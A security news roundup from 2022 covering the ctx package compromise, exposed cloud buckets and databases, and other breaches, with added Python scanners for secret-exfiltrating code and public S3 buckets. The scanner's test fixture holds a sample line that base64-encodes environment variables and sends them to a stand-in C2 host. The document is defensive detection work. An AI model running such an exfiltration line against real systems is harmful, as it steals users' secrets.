May 24, 2022
PyPI package 'ctx' has been compromised by malicious actors to steal environment variables. The package, which typically gets over 22,000 downloads a week, had its code altered to collect environment variables, base64-encode them, and send them to a C2 server. In addition to the PyPI package, a fork of the PHP library 'phpass' was altered in the same way to retrieve AWS developer secrets and send them to the same C2 address as the ctx package.
Data Security Perspective: For users of ctx, older versions of the package do not contain the malicious code. Versions 0.2.2, 0.2.6, and above should be treated with caution, and users can inspect the installed code for the malicious additions. For users of phpass, the package appears to have been remediated to stop the attack.
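As an added illustration (not code from the advisory or from the ctx project), the following heuristic scan, written for this page, parses a module's Python source and flags code that both reads the process environment and makes an outbound network call, the combination described above; base64-style encoding is reported as a supporting indicator. The indicator tables are an assumption of this example, not a published signature, and the two sample modules at the bottom are constructed for the test.

```python
import ast
# Indicator tables: an assumption made for this example, not a published signature.
ENV_NAMES = {"os.environ", "os.getenv"}
ENCODERS = {"b64encode", "urlsafe_b64encode", "b32encode", "b16encode"}
NET_CALLS = {"urllib.request.urlopen", "urllib.request.Request", "requests.get",
             "requests.post", "http.client.HTTPConnection",
             "http.client.HTTPSConnection", "socket.create_connection", "socket.socket"}

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for any other node."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    return ".".join(reversed(parts + [node.id]))

def scan_source(source):
    """Report env reads, base64-style encoding and outbound calls in one module."""
    tree = ast.parse(source)
    # Names pulled in with 'from os import environ' lose their 'os.' prefix.
    from_os = {alias.asname or alias.name for node in ast.walk(tree)
               if isinstance(node, ast.ImportFrom) and node.module == "os"
               for alias in node.names}
    found = {"env_read": False, "encode": False, "network": False}
    for node in ast.walk(tree):
        name = dotted_name(node)
        if name is None:
            continue
        root, leaf = name.split(".")[0], name.split(".")[-1]
        if name in ENV_NAMES or name.startswith("os.environ.") or (
                root in from_os and root in {"environ", "getenv"}):
            found["env_read"] = True
        elif root == "base64" and leaf in ENCODERS:
            found["encode"] = True
        elif name in NET_CALLS:
            found["network"] = True
    # Reading the environment is normal; reading it and phoning out is the signal.
    found["suspicious"] = found["env_read"] and found["network"]
    return found

# Constructed samples for this example; not the real ctx payload.
SUSPECT = """
import os, base64, urllib.request
blob = base64.b64encode(str(dict(os.environ)).encode())
urllib.request.urlopen("http://c2.example.invalid/?" + blob.decode())
"""
BENIGN = 'import os\nDB_URL = os.environ.get("DATABASE_URL", "sqlite:///local.db")\n'
```

Run scan_source over each .py file of an installed package (for example the ctx directory under site-packages) and review any module reported as suspicious by hand; the heuristic is a triage aid, not proof of compromise.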
May 11, 2022
Researchers from SafetyDetectives have uncovered a misconfigured AWS S3 bucket belonging to a Pennsylvania breast cancer charity, Breastcancer.org. The bucket, which was left unsecured, contained over 150,000 files, or 150 GB of data. The data included user avatars and images users had posted, including private medical images containing nudity. In addition, the EXIF metadata in the images was still intact, which includes GPS location and device details. The exposed bucket was discovered in November 2021 and has been secured as of May 2022.
Data Security Perspective: Cloud misconfigurations pose a massive risk to organizations and can have severe consequences. Organizations should ensure security policies are followed in order to prevent data exposure. Solutions such as Open Raven or Magpie can discover and alert about exposed data, along with other security policy violations.
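To make the misconfiguration concrete, here is an added example (not SafetyDetectives', Open Raven's or Magpie's code) that evaluates whether an S3 bucket is reachable by anyone, from its ACL, its Public Access Block settings and its bucket policy. The inputs are constructed dictionaries in the shape of the boto3 get_bucket_acl and get_public_access_block responses and the policy string returned by get_bucket_policy, so it runs offline; the placeholder account and bucket names are assumptions.

```python
import json
# Grantee URIs that make an ACL grant world- or any-AWS-account-readable.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

def _principal_is_public(principal):
    """True for the wildcard principal forms '*' and {'AWS': '*'} (or a list holding '*')."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in ([aws] if isinstance(aws, str) else aws)
    return False

def public_exposure(acl, block_config, policy_json=None):
    """List the reasons a bucket is reachable by anyone; an empty list means not public."""
    # A bucket with no Public Access Block at all (pass {}) behaves as if every setting were False.
    block = block_config.get("PublicAccessBlockConfiguration", {})
    findings = []
    # Public ACL grants stay live unless IgnorePublicAcls is on.
    if not block.get("IgnorePublicAcls", False):
        for grant in acl.get("Grants", []):
            grantee = grant.get("Grantee", {})
            if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GRANTEES:
                group = grantee["URI"].rsplit("/", 1)[-1]
                findings.append(f"ACL grants {grant['Permission']} to {group}")
    # Wildcard-principal Allow statements stay live unless RestrictPublicBuckets is on.
    if policy_json and not block.get("RestrictPublicBuckets", False):
        statements = json.loads(policy_json).get("Statement", [])
        for stmt in ([statements] if isinstance(statements, dict) else statements):
            if (stmt.get("Effect") == "Allow" and _principal_is_public(stmt.get("Principal"))
                    and not stmt.get("Condition")):
                findings.append(f"policy allows {stmt.get('Action')} to any principal")
    return findings

# Constructed inputs shaped like the boto3 responses, for this example only.
EXPOSED_ACL = {"Grants": [{"Grantee": {"Type": "Group",
               "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"}]}
PRIVATE_ACL = {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-id-placeholder"},
               "Permission": "FULL_CONTROL"}]}
NO_BLOCK = {"PublicAccessBlockConfiguration": {k: False for k in (
    "BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")}}
FULL_BLOCK = {"PublicAccessBlockConfiguration": {k: True for k in (
    "BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")}}
PUBLIC_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
    "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::bucket-placeholder/*"}]})
```

The same check should be run on every bucket in every region on a schedule, since a bucket that is private today can be opened by a later ACL or policy change.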
April 28, 2022
Researchers at Wiz have discovered a vulnerability in the Microsoft Azure Database for PostgreSQL Flexible Server. The vulnerability, named "#ExtraReplica", bypasses tenant isolation, enabling unauthorized read access to other PostgreSQL databases. Malicious actors could gain this access by exploiting a bug in the Flexible Server authentication process to obtain elevated privileges, then abusing an improperly anchored regular expression to reach other customers' databases.
Data Security Perspective: Microsoft responded to the vulnerability with patches for the Flexible Server released in February 2022 and said that no customers had been affected. As noted by Wiz, this vulnerability highlights the lack of a cloud vulnerability database, similar to the CVE database, which would enable users to track and respond to cloud vulnerabilities.
May 5, 2022
After last month's security alert from GitHub that threat actors were stealing OAuth tokens from Heroku and Travis-CI, Heroku announced that the same stolen token was used to breach its customer database. The company stated that the threat actor accessed and exfiltrated customer passwords from a customer database. Heroku had initially reported that the stolen OAuth tokens could only give threat actors access to GitHub repositories, not to Heroku customer accounts.
April 21, 2022
Cryptomining botnet LemonDuck has been targeting Docker to mine cryptocurrency on Linux. Exposed Docker APIs are targeted with a custom entry point that downloads a disguised Bash script. The script then sets up a cron job which downloads the payload; the payload kills processes, daemons, and known network connections, removes competing cryptominers, and finally downloads and runs the XMRig cryptominer.
Data Security Perspective: The misuse of exposed Docker APIs is increasing, especially for cryptomining. Users should ensure the Docker daemon and its API are securely configured and not reachable from the network without authentication.
April 28, 2022
Medical software company Dedalus Biology has been fined 1.5 million euros after exposing the PII of nearly 500,000 patients. The data, which came from a leaked database, included full names, genetic information, medical details such as diagnosed conditions, and social security numbers. The leak appears to go back to March 2020, with parts of the dataset sold online in 2021. In total, Dedalus Biology was found to have committed three violations of GDPR, with fines totaling 1.5 million euros.
Data Security Perspective: Compliance is important for companies, especially those operating in Europe, as data exposure can lead to massive fines. Proper authentication and encryption are essential for organizations, especially when handling sensitive data.
An exposed database belonging to FOX has been discovered by security researchers from Website Planet. The database contained 58 GB of information, with nearly 13,000,000 records, including internal emails, employee ID numbers, IP addresses, host information, and cast and crew names, among other details. While it is not apparent how long the database was exposed, it has since been secured.
Data Security Perspective: Having the correct configurations for databases and cloud resources is vital for organizations. This story highlights how even large corporations with security teams can be vulnerable to data exposure.
Anchore Engine is an open-source tool that analyzes container images against user-customizable policies and also evaluates the images for known vulnerabilities. Anchore Engine can be used with multiple orchestration platforms, including Docker, Kubernetes, and Amazon ECS.